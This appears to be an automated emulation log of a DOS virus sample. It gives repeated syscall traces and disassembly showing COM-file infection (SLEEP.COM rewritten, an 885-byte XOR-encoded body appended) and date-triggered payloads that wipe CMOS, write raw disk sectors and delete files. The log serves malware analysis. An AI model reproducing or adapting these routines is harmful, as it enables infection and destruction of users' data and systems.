2018-12-25T12:41:55.318123253Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:55.326078708Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:55.333875465Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:55.33531355Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:55.337935515Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:55.341080707Z 66 PC: 12d8e | Move file pointer
2018-12-25T12:41:55.342717222Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:55.346471235Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:55.365178339Z 62 PC: 12dab | Close file
2018-12-25T12:41:55.371306759Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.373886184Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.379515673Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.385157803Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.386769313Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.388133829Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.389994958Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.391592757Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.394246089Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.400623537Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.41038816Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.415905496Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.423405124Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.431037691Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.434133142Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.43670682Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.44019224Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.44273131Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.445650912Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.455647848Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.465773863Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.469164434Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.476920802Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.484809721Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.486835431Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.48843116Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.49226889Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.494778148Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.496599707Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.505416897Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.514890506Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.516903111Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.521997252Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.527368432Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.528901099Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.53015336Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.532622326Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.533778837Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.535505233Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.541924896Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.547391164Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:55.548496088Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-25T12:41:55.550888366Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-25T12:41:55.552507605Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:55.553920764Z 19 PC: 12b55 | Delete file
2018-12-25T12:41:55.557743829Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:56.019598382Z 26 PC: 12a73 | Set disk transfer address
2018-12-25T12:41:56.023721528Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:41:56.024839844Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:41:56.02628089Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:56.034208386Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:56.04061155Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:56.046800424Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:56.049668635Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:56.051344082Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:56.054266584Z 66 PC: 12d8e | Move file pointer
2018-12-25T12:41:56.067913407Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:56.070342629Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:56.086086343Z 62 PC: 12dab | Close file
2018-12-25T12:41:56.09390792Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.096872256Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.102834458Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.107589907Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.110150696Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.111793865Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.114368074Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.116542745Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.119244466Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.126665087Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.13476833Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.136732672Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.141937014Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.149336611Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.151079991Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.153257807Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.157470131Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.158949253Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.161237767Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.169941833Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.17840851Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.195086114Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.20227711Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.208789528Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.210476787Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.212804201Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.216480402Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.218092682Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.220707936Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.230227822Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.24981594Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.252499304Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.259631571Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.265871751Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.267318726Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.269834531Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.273047552Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.274851231Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.278497394Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.287255792Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.296180323Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:56.297700924Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-25T12:41:56.300874109Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-25T12:41:56.303224966Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:56.305565002Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs

{"DateBased":true,"Day":1,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:56.109962302Z 26 PC: 12a73 | Set disk transfer address
2018-12-25T12:41:56.11153659Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:41:56.113093719Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:41:56.114372779Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:56.121309901Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:56.128906366Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:56.135946693Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:56.137503658Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:56.139756337Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:56.142857883Z 66 PC: 12d8e | Move file pointer
2018-12-25T12:41:56.144363785Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:56.147458256Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:56.164980716Z 62 PC: 12dab | Close file
2018-12-25T12:41:56.176049373Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.184109792Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.191604826Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.198749962Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.201501707Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.203165877Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.206420174Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.208527812Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.2124635Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.221657187Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.231398426Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.235879828Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.243196459Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.250809747Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.253233396Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.25475075Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.257860029Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.260119587Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.263195013Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.272414638Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.282000235Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.285301272Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.292989106Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.300688569Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.303325265Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.305261688Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.3079359Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.332481847Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.335261711Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.347922533Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.361884572Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.369309352Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.376635682Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.384413405Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.385949143Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.387505306Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.391012786Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.392626664Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.395757618Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.40694275Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.416460006Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:56.417880521Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-25T12:41:56.421051038Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-25T12:41:56.428592467Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:56.431366255Z 19 PC: 12b55 | Delete file
2018-12-25T12:41:56.438308134Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs

{"DateBased":true,"Day":8,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:56.181454274Z 26 PC: 12a73 | Set disk transfer address
2018-12-25T12:41:56.183965092Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:41:56.185415772Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:41:56.186891988Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:56.19301909Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:56.206787735Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:56.2136028Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:56.215263337Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:56.2187391Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:56.222193848Z 66 PC: 12d8e | Move file pointer
2018-12-25T12:41:56.224336034Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:56.227709187Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:56.246726307Z 62 PC: 12dab | Close file
2018-12-25T12:41:56.254855869Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.258326082Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.265037627Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.271431764Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.273804705Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.275119215Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.277601228Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.287151877Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.292882795Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.318767502Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.337414279Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.340020039Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.351819586Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.359349858Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.361381393Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.363096351Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.366145194Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.368328778Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.371019595Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.37941663Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.403268294Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.410418254Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.416671537Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.424236264Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.425837928Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.427468101Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.431359124Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.432983659Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.435554368Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.444903743Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.453049357Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.455850619Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.462973285Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.469627141Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.471042736Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.472755307Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.47568245Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.47707463Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.479484574Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.488526909Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.497030643Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:56.498438467Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-25T12:41:56.501151729Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-25T12:41:56.50340259Z 25 PC: 12b3f | Get default drive
2018-12-25T12:41:56.506492753Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
